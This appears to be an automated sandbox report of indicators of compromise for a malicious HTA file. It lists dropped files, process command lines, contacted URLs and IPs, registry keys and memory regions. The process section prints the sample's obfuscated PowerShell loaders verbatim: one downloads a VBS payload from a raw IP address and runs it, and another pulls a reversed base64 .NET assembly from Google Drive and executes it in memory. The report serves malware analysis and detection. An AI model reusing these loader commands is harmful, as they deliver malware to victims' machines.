IOC Report
seethebestthingsevermeetwithgreatthingstobegood.hta

loading gif

Files

File Path
Type
Category
Malicious
seethebestthingsevermeetwithgreatthingstobegood.hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\c0m0n3e0\c0m0n3e0.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\logisticthingswithgoodthingsgivenbest[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\RESC7DB.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Fri Oct 25 10:27:16 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tahbedb.btd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vo1jysh.wms.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aijqtqqd.zps.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b3vyzhjw.k5k.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilisadwp.ayg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kevtdmyr.5ya.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vx1mvpit.1gm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2tfq3nx.zhd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yyyomb2p.ie1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrdhnjul.sld.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\c0m0n3e0\CSC399845D2C88840F7A4BEE62F5A991150.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\c0m0n3e0\c0m0n3e0.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (349)
dropped
C:\Users\user\AppData\Local\Temp\c0m0n3e0\c0m0n3e0.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\c0m0n3e0\c0m0n3e0.out
Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
modified
There are 10 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\seethebestthingsevermeetwithgreatthingstobegood.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SySTeM32\winDowspOWErShell\v1.0\PoweRShELl.EXe" "powErshell -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt ; IeX($(iex('[SystEM.TExt.EncoDING]'+[ChAr]0x3A+[char]58+'UTf8.gETSTrIng([SystEm.cOnVeRT]'+[CHar]0x3A+[ChaR]58+'FROMBasE64STRIng('+[cHar]0X22+'JFpibFZsdVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFckRlRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExIayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb2FseXlhR21BWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpUkpqdVRGeUZsTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhZIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFPaGJRUSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRaYmxWbHVSdDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3Ni4xNDEvNDIvbG9naXN0aWN0aGluZ3N3aXRoZ29vZHRoaW5nc2dpdmVuYmVzdC50SUYiLCIkRU5WOkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIiwwLDApO3N0QVJ0LXNsZWVwKDMpO3N0QVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcb2dpc3RpY3RoaW5nc3dpdGhnb29kdGhpbmdzZ2l2ZW5iZXMudmJTIg=='+[Char]0x22+'))')))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex ByPasS -NoP -w 1 -c DEViCeCREdentialDEpLoyMEnt
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c0m0n3e0\c0m0n3e0.cmdline"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ogisticthingswithgoodthingsgivenbes.vbS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdXaDdpbWFnZVVybCA9IHJmSWh0dHBzOi8vZHJpdmUuZ28nKydvZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHJmSTtXaDd3ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O1doN2ltYScrJ2dlQnl0ZXMgPSBXaCcrJzcnKyd3ZWJDbGllbnQuRG93bmxvYWREYXRhKFdoN2ltYWdlVXJsKTtXaDdpbScrJ2FnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW4nKydjb2RpbmddOjpVVEY4LkdldFN0JysncmluZyhXaCcrJzdpbWFnZUJ5dGVzKTtXaDdzdGFyJysndEZsYWcgPSByZkk8PEJBU0U2NF9TVEFSVD4+cmZJO1doN2VuZEZsYWcgPSByZkk8PEJBU0U2NCcrJ19FTkQ+PnJmSTtXaDdzdGFydEluZGV4ID0gV2g3aW1hZ2VUZXh0LkluZGV4T2YoV2g3c3RhcnRGbGFnKTtXaDdlbmRJbicrJ2RleCA9IFdoN2ltYScrJ2dlVGV4dC5JbmRleE9mKFdoN2VuZEZsYScrJ2cpO1doN3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBXaDdlbmRJbmRleCAtZ3QgV2g3c3RhcnRJbmQnKydleDtXJysnaDdzdGFydEluZGV4ICs9IFdoN3N0YXJ0RmxhZy5MZW5ndGg7V2g3YmFzZTY0TGVuZ3RoID0gV2g3ZW5kSW5kZXggLSBXaDdzdGFydEluZGV4O1doN2Jhc2U2NENvbW1hbmQgPSBXaDdpbWFnZVRleHQuU3Vic3RyaW5nKFdoN3N0YXJ0SW5kZXgsIFdoN2Jhc2U2NExlbmd0aCknKyc7V2g3YmEnKydzZTY0UicrJ2V2ZXJzZWQgPSAtam9pbiAoV2g3YmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJZOSBGb3JFYWNoLU9iamVjdCB7IFdoNycrJ18gfSlbLTEuLi0oV2g3YmFzZTY0Q29tbWFuZC5MZW5ndGgnKycpXTtXaDdjJysnb21tYW5kQnl0ZXMgPSBbU3lzdCcrJ2VtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFdoN2JhJysnc2U2NFJldmVyc2VkKTtXaDdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoV2g3Y29tbWFuJysnZEJ5dGVzJysnKTtXaDd2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHJmSVZBSXJmSSk7JysnV2g3dmFpTWV0aG9kLkludm9rZShXaDdudWwnKydsLCBAKHJmSXR4dC5JS0xHT0wvMjQvMTQxLjY3MS4zLicrJzI5MS8vOnB0dGhyZkknKycsIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWRlc2F0aXZhZG9yZkksIHJmSWFzcG5ldF9yZWdicm93c2Vyc3JmSSwgcmZJZGVzYXRpdmFkb3JmSSwgcmZJZGVzYXRpdmFkb3JmSSxyZklkJysnZXNhdGl2YWRvJysncmZJLHJmJysnSWRlc2F0aXZhJysnZG9yZkkscmZJZGVzYXRpdmFkb3JmSSxyZklkZXNhdGl2YWQnKydvcmZJLHJmSWRlc2F0aXZhZCcrJ29yZkkscmZJMXJmSSxyZklkZXNhdGl2YWRvcmZJKSk7JykuUkVQTEFjRSgoW0NIYXJdODcrW0NIYXJdMTA0K1tDSGFyXTU1KSwnJCcpLlJFUExBY0UoJ3JmSScsW3N0cmluR11bQ0hhcl0zOSkuUkVQTEFjRSgoW0NIYXJdODIrW0NIYXJdODkrW0NIYXJdNTcpLFtzdHJpbkddW0NIYXJdMTI0KSB8LiAoICRWRXJCb1NFUHJlZkVyZU5DZS5Ub3NUUmluZygpWzEsM10rJ1gnLWpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Wh7imageUrl = rfIhttps://drive.go'+'ogle.com/uc?export=download&id='+'1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur rfI;Wh7webCli'+'ent = New-Object System.Net.WebClient;Wh7ima'+'geBytes = Wh'+'7'+'webClient.DownloadData(Wh7imageUrl);Wh7im'+'ageText = [System.Tex'+'t.En'+'coding]::UTF8.GetSt'+'ring(Wh'+'7imageBytes);Wh7star'+'tFlag = rfI<<BASE64_START>>rfI;Wh7endFlag = rfI<<BASE64'+'_END>>rfI;Wh7startIndex = Wh7imageText.IndexOf(Wh7startFlag);Wh7endIn'+'dex = Wh7ima'+'geText.IndexOf(Wh7endFla'+'g);Wh7startIndex -ge 0 -and Wh7endIndex -gt Wh7startInd'+'ex;W'+'h7startIndex += Wh7startFlag.Length;Wh7base64Length = Wh7endIndex - Wh7startIndex;Wh7base64Command = Wh7imageText.Substring(Wh7startIndex, Wh7base64Length)'+';Wh7ba'+'se64R'+'eversed = -join (Wh7base64Command.ToCharArray() RY9 ForEach-Object { Wh7'+'_ })[-1..-(Wh7base64Command.Length'+')];Wh7c'+'ommandBytes = [Syst'+'em.Convert]::FromBase64String(Wh7ba'+'se64Reversed);Wh7loadedAssembly = [System.Reflection.Assembly]::Load(Wh7comman'+'dBytes'+');Wh7vaiMethod = [dnlib.IO.Home].GetMethod(rfIVAIrfI);'+'Wh7vaiMethod.Invoke(Wh7nul'+'l, @(rfItxt.IKLGOL/24/141.671.3.'+'291//:ptthrfI'+', rfIdesativadorfI, rfIdesativadorfI, rfIdesativadorfI, rfIaspnet_regbrowsersrfI, rfIdesativadorfI, rfIdesativadorfI,rfId'+'esativado'+'rfI,rf'+'Idesativa'+'dorfI,rfIdesativadorfI,rfIdesativad'+'orfI,rfIdesativad'+'orfI,rfI1rfI,rfIdesativadorfI));').REPLAcE(([CHar]87+[CHar]104+[CHar]55),'$').REPLAcE('rfI',[strinG][CHar]39).REPLAcE(([CHar]82+[CHar]89+[CHar]57),[strinG][CHar]124) |. ( $VErBoSEPrefEreNCe.TosTRing()[1,3]+'X'-joIn'')"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC7DB.tmp" "c:\Users\user\AppData\Local\Temp\c0m0n3e0\CSC399845D2C88840F7A4BEE62F5A991150.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://drive.go
unknown
malicious
http://192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIF
192.3.176.141
malicious
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://www.microsoft.2
unknown
http://drive.usercontent.google.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://www.microsoft.
unknown
http://go.micros
unknown
https://aka..winsvr
unknown
https://github.com/Pester/Pester
unknown
https://drive.usercontent.googleX
unknown
http://crl.micro
unknown
https://aka.ms/pscore6lB
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
http://192.3.176.141/42/logisticthingswithgoodthingsgivenbest.tIFp6ZT
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 16 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.185.142
drive.usercontent.google.com
142.250.185.193

IPs

IP
Domain
Country
Malicious
192.3.176.141
unknown
United States
malicious
142.250.185.142
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7CC0000
trusted library allocation
page read and write
6A20000
heap
page read and write
27ED000
heap
page read and write
7C4D000
trusted library allocation
page read and write
2774000
heap
page read and write
6D1F000
stack
page read and write
85F0000
heap
page read and write
4E34000
heap
page read and write
7280000
trusted library allocation
page read and write
27F1000
heap
page read and write
6890000
trusted library allocation
page read and write
2D96000
heap
page read and write
322E000
stack
page read and write
76CE000
stack
page read and write
79C1000
heap
page read and write
62BA000
heap
page read and write
4A1E000
stack
page read and write
3B0000
heap
page read and write
6F83000
heap
page read and write
7110000
trusted library allocation
page read and write
6C1B000
heap
page read and write
700D000
heap
page read and write
711C000
heap
page read and write
A30000
heap
page read and write
493F000
stack
page read and write
72C0000
heap
page execute and read and write
6F26000
heap
page read and write
4B33000
trusted library allocation
page read and write
6C0E000
stack
page read and write
710D000
heap
page read and write
7400000
trusted library allocation
page read and write
76CE000
stack
page read and write
27FE000
heap
page read and write
5B79000
trusted library allocation
page read and write
722E000
heap
page read and write
7C70000
trusted library allocation
page read and write
6FA1000
heap
page read and write
3100000
heap
page read and write
51D000
stack
page read and write
6FA8000
heap
page read and write
6F26000
heap
page read and write
503E000
stack
page read and write
4DF0000
heap
page execute and read and write
6F1C000
heap
page read and write
30D0000
heap
page read and write
6F52000
heap
page read and write
6730000
heap
page read and write
3374000
trusted library allocation
page read and write
700E000
stack
page read and write
7C50000
trusted library allocation
page read and write
4E60000
heap
page read and write
4CBE000
stack
page read and write
6337000
heap
page read and write
6FB7000
heap
page read and write
6FAC000
heap
page read and write
AAE000
stack
page read and write
4B71000
trusted library allocation
page read and write
2DF8000
heap
page read and write
27EA000
heap
page read and write
3050000
heap
page read and write
AC0000
heap
page read and write
4AAC000
heap
page read and write
5050000
heap
page read and write
6FA1000
heap
page read and write
634A000
trusted library allocation
page read and write
6FA3000
heap
page read and write
2FFA000
heap
page read and write
4820000
heap
page read and write
6B68000
heap
page read and write
6FA1000
heap
page read and write
4859000
heap
page read and write
2806000
heap
page read and write
7C10000
trusted library allocation
page read and write
4A93000
heap
page read and write
734F000
stack
page read and write
90E000
stack
page read and write
2802000
heap
page read and write
4AC8000
heap
page read and write
4BFF000
stack
page read and write
4B83000
heap
page read and write
6FA1000
heap
page read and write
2FA3000
heap
page read and write
4B4E000
stack
page read and write
6FB7000
heap
page read and write
4BA4000
heap
page read and write
49DE000
stack
page read and write
8311000
trusted library allocation
page read and write
6AC8000
heap
page read and write
731E000
stack
page read and write
2C7C000
stack
page read and write
624F000
heap
page read and write
2FB0000
heap
page read and write
4C10000
heap
page readonly
A70000
heap
page read and write
72EF000
stack
page read and write
9F0000
trusted library allocation
page read and write
2AEA000
stack
page read and write
2804000
heap
page read and write
5B36000
trusted library allocation
page read and write
2FA1000
heap
page read and write
3098000
stack
page read and write
6F66000
heap
page read and write
73DD000
stack
page read and write
7B2E000
stack
page read and write
629A000
heap
page read and write
73D0000
trusted library allocation
page read and write
274B000
heap
page read and write
6F26000
heap
page read and write
3080000
heap
page read and write
4862000
heap
page read and write
4C26000
trusted library allocation
page read and write
786E000
heap
page read and write
3000000
heap
page read and write
2742000
heap
page read and write
73B0000
trusted library allocation
page read and write
6F7F000
heap
page read and write
A60000
trusted library allocation
page read and write
484D000
heap
page read and write
7C90000
trusted library allocation
page read and write
277F000
heap
page read and write
4800000
heap
page read and write
8AE0000
trusted library allocation
page read and write
400000
heap
page read and write
830000
heap
page read and write
4AD8000
heap
page read and write
4B18000
heap
page read and write
70B6000
heap
page read and write
19B000
stack
page read and write
4AD8000
heap
page read and write
8B00000
trusted library allocation
page read and write
4C28000
trusted library allocation
page read and write
6FA8000
heap
page read and write
6FAC000
heap
page read and write
7698000
heap
page read and write
4A7D000
stack
page read and write
27DD000
heap
page read and write
8630000
trusted library allocation
page read and write
67CE000
stack
page read and write
6530000
trusted library allocation
page read and write
6258000
heap
page read and write
5F35000
trusted library allocation
page read and write
7879000
heap
page read and write
7FCE000
stack
page read and write
8058000
heap
page read and write
7FA80000
trusted library allocation
page execute and read and write
6E10000
heap
page read and write
6D11000
heap
page read and write
49D000
stack
page read and write
2774000
heap
page read and write
62B7000
heap
page read and write
48AD000
stack
page read and write
6BAE000
stack
page read and write
6E20000
heap
page read and write
494F000
stack
page read and write
6FBC000
heap
page read and write
2FFF000
heap
page read and write
634C000
trusted library allocation
page read and write
4840000
heap
page read and write
2FFE000
heap
page read and write
5950000
heap
page read and write
544E000
trusted library allocation
page read and write
44CE000
stack
page read and write
6FC1000
heap
page read and write
2720000
heap
page read and write
8610000
trusted library allocation
page read and write
6F58000
heap
page read and write
792F000
heap
page read and write
6F93000
heap
page read and write
45EE000
stack
page read and write
C70000
heap
page read and write
7E20000
trusted library allocation
page read and write
8E4C000
stack
page read and write
AC0000
trusted library allocation
page execute and read and write
5EF9000
trusted library allocation
page read and write
71AA000
heap
page read and write
4A9C000
heap
page read and write
7290000
trusted library allocation
page read and write
62B5000
heap
page read and write
6FA3000
heap
page read and write
3420000
heap
page read and write
53E0000
heap
page read and write
302F000
heap
page read and write
774E000
stack
page read and write
4B98000
heap
page read and write
7166000
heap
page read and write
8C55000
trusted library allocation
page read and write
6F8E000
heap
page read and write
6F8E000
stack
page read and write
57C000
stack
page read and write
7EC0000
trusted library allocation
page read and write
6284000
heap
page read and write
7410000
trusted library allocation
page read and write
2D20000
heap
page read and write
6958000
trusted library allocation
page read and write
6FA3000
heap
page read and write
6F6A000
heap
page read and write
7460000
trusted library allocation
page read and write
5273000
trusted library allocation
page read and write
484F000
heap
page read and write
6FB7000
heap
page read and write
629A000
heap
page read and write
D68000
heap
page read and write
5401000
heap
page read and write
4965000
heap
page read and write
2EA0000
heap
page read and write
6C4A000
stack
page read and write
6E2E000
stack
page read and write
6253000
heap
page read and write
51CD000
trusted library allocation
page read and write
2804000
heap
page read and write
27EB000
heap
page read and write
4B98000
heap
page read and write
11B0000
heap
page read and write
6FBC000
heap
page read and write
8056000
heap
page read and write
62B4000
heap
page read and write
6F52000
heap
page read and write
3102000
heap
page read and write
6FD0000
heap
page read and write
4AD1000
trusted library allocation
page read and write
498E000
stack
page read and write
80CE000
stack
page read and write
327F000
stack
page read and write
6F82000
heap
page read and write
6245000
heap
page read and write
4B50000
trusted library allocation
page read and write
6F9A000
heap
page read and write
6FA8000
heap
page read and write
751B000
stack
page read and write
4C7E000
stack
page read and write
6254000
heap
page read and write
5C72000
trusted library allocation
page read and write
2815000
heap
page read and write
3056000
heap
page read and write
78E2000
heap
page read and write
2742000
heap
page read and write
4877000
heap
page read and write
2B65000
trusted library allocation
page execute and read and write
4B83000
heap
page read and write
4620000
heap
page read and write
32DE000
stack
page read and write
2C98000
heap
page read and write
62B4000
heap
page read and write
77D4000
heap
page read and write
62F9000
heap
page read and write
6FC1000
heap
page read and write
3360000
trusted library allocation
page read and write
7C00000
trusted library allocation
page read and write
6F9F000
heap
page read and write
7163000
heap
page read and write
883C000
stack
page read and write
529E000
stack
page read and write
A0D000
trusted library allocation
page execute and read and write
4DEB000
trusted library allocation
page read and write
6D11000
heap
page read and write
7EB0000
trusted library allocation
page read and write
6C18000
heap
page read and write
6284000
heap
page read and write
7B50000
trusted library allocation
page read and write
7149000
heap
page read and write
4AD4000
heap
page read and write
2815000
heap
page read and write
3460000
trusted library allocation
page read and write
2FFE000
heap
page read and write
527B000
trusted library allocation
page read and write
6B66000
heap
page read and write
6A74000
heap
page read and write
30CD000
stack
page read and write
72DD000
stack
page read and write
A03000
trusted library allocation
page execute and read and write
2728000
heap
page read and write
629A000
heap
page read and write
2A1E000
stack
page read and write
78A0000
heap
page read and write
10DE000
stack
page read and write
3167000
heap
page read and write
8AFC000
trusted library allocation
page read and write
2EEE000
stack
page read and write
4AD2000
heap
page read and write
27F1000
heap
page read and write
80F1000
heap
page read and write
6B5D000
heap
page read and write
4E4E000
stack
page read and write
7B80000
trusted library allocation
page read and write
6261000
heap
page read and write
6F7A000
heap
page read and write
810E000
stack
page read and write
4BA3000
heap
page read and write
33C9000
heap
page read and write
7126000
heap
page read and write
6B66000
heap
page read and write
6284000
heap
page read and write
728E000
trusted library allocation
page read and write
6C90000
heap
page execute and read and write
7230000
trusted library allocation
page execute and read and write
73E0000
trusted library allocation
page read and write
309D000
stack
page read and write
280B000
heap
page read and write
84E0000
trusted library allocation
page read and write
4FA0000
heap
page read and write
483C000
heap
page read and write
4B39000
trusted library allocation
page read and write
51E9000
trusted library allocation
page read and write
7F8E000
stack
page read and write
634E000
trusted library allocation
page read and write
7440000
trusted library allocation
page read and write
7D50000
trusted library allocation
page read and write
6C1A000
heap
page read and write
778E000
stack
page read and write
71F3000
heap
page read and write
98F000
stack
page read and write
9CE000
stack
page read and write
6537000
trusted library allocation
page read and write
27A0000
heap
page read and write
5467000
heap
page read and write
2C10000
heap
page readonly
6F59000
heap
page read and write
6BEA000
stack
page read and write
54CD000
heap
page read and write
280B000
heap
page read and write
4ED1000
trusted library allocation
page read and write
5421000
heap
page read and write
5281000
trusted library allocation
page read and write
3314000
heap
page read and write
487F000
heap
page read and write
6B68000
heap
page read and write
724C000
stack
page read and write
6FB7000
heap
page read and write
6FA3000
heap
page read and write
4BC2000
heap
page read and write
66CD000
stack
page read and write
27FE000
heap
page read and write
5BD6000
trusted library allocation
page read and write
27DF000
heap
page read and write
9EA0000
heap
page read and write
3346000
heap
page read and write
7B60000
trusted library allocation
page read and write
4DE0000
trusted library allocation
page read and write
6F18000
heap
page read and write
7B0E000
stack
page read and write
6263000
heap
page read and write
6FA1000
heap
page read and write
2D0F000
stack
page read and write
8B10000
trusted library allocation
page read and write
7EBD000
trusted library allocation
page read and write
4E30000
heap
page read and write
45AE000
stack
page read and write
812A000
heap
page read and write
6FDA000
heap
page read and write
4A90000
heap
page read and write
62B5000
heap
page read and write
4DCE000
stack
page read and write
489D000
heap
page read and write
6F59000
heap
page read and write
3470000
trusted library allocation
page read and write
6670000
direct allocation
page read and write
7F4E000
stack
page read and write
4EC0000
heap
page execute and read and write
4AA4000
heap
page read and write
627F000
heap
page read and write
5020000
heap
page read and write
726E000
stack
page read and write
2D5C000
heap
page read and write
51DF000
trusted library allocation
page read and write
4AD8000
heap
page read and write
6FCE000
stack
page read and write
7C10000
trusted library allocation
page read and write
482E000
heap
page read and write
5BD000
stack
page read and write
73FE000
stack
page read and write
4960000
heap
page read and write
8600000
trusted library allocation
page execute and read and write
6355000
trusted library allocation
page read and write
6EA7000
heap
page read and write
75CD000
stack
page read and write
6C2C000
stack
page read and write
72B9000
trusted library allocation
page read and write
4B98000
heap
page read and write
6DCF000
heap
page read and write
770E000
stack
page read and write
2FE0000
heap
page read and write
80DD000
heap
page read and write
6337000
heap
page read and write
AA0000
trusted library allocation
page read and write
2810000
heap
page read and write
525D000
trusted library allocation
page read and write
808E000
stack
page read and write
27F1000
heap
page read and write
2D10000
trusted library allocation
page read and write
6FB7000
heap
page read and write
4DC000
stack
page read and write
629A000
heap
page read and write
7E10000
trusted library allocation
page read and write
27DF000
heap
page read and write
5DE000
stack
page read and write
27EB000
heap
page read and write
2ACE000
stack
page read and write
2FB0000
heap
page read and write
2B80000
trusted library allocation
page read and write
738E000
stack
page read and write
AB0000
trusted library allocation
page read and write
6710000
direct allocation
page read and write
6D9B000
stack
page read and write
AB4000
trusted library allocation
page read and write
73E0000
trusted library allocation
page execute and read and write
5215000
trusted library allocation
page read and write
5B99000
trusted library allocation
page read and write
AC9000
heap
page read and write
4B1B000
heap
page read and write
4D80000
heap
page execute and read and write
86F0000
heap
page read and write
70E0000
heap
page read and write
7D30000
trusted library allocation
page execute and read and write
532B000
trusted library allocation
page read and write
32CE000
stack
page read and write
4E4E000
stack
page read and write
490E000
stack
page read and write
7C60000
trusted library allocation
page read and write
4DDE000
stack
page read and write
6337000
heap
page read and write
34C0000
heap
page read and write
3386000
heap
page read and write
6F7C000
heap
page read and write
71C0000
trusted library allocation
page read and write
653B000
trusted library allocation
page read and write
4B70000
trusted library allocation
page read and write
727E000
stack
page read and write
6264000
heap
page read and write
D50000
heap
page read and write
66C2000
direct allocation
page read and write
6F59000
heap
page read and write
6263000
heap
page read and write
27FE000
heap
page read and write
33A000
stack
page read and write
281B000
heap
page read and write
332E000
stack
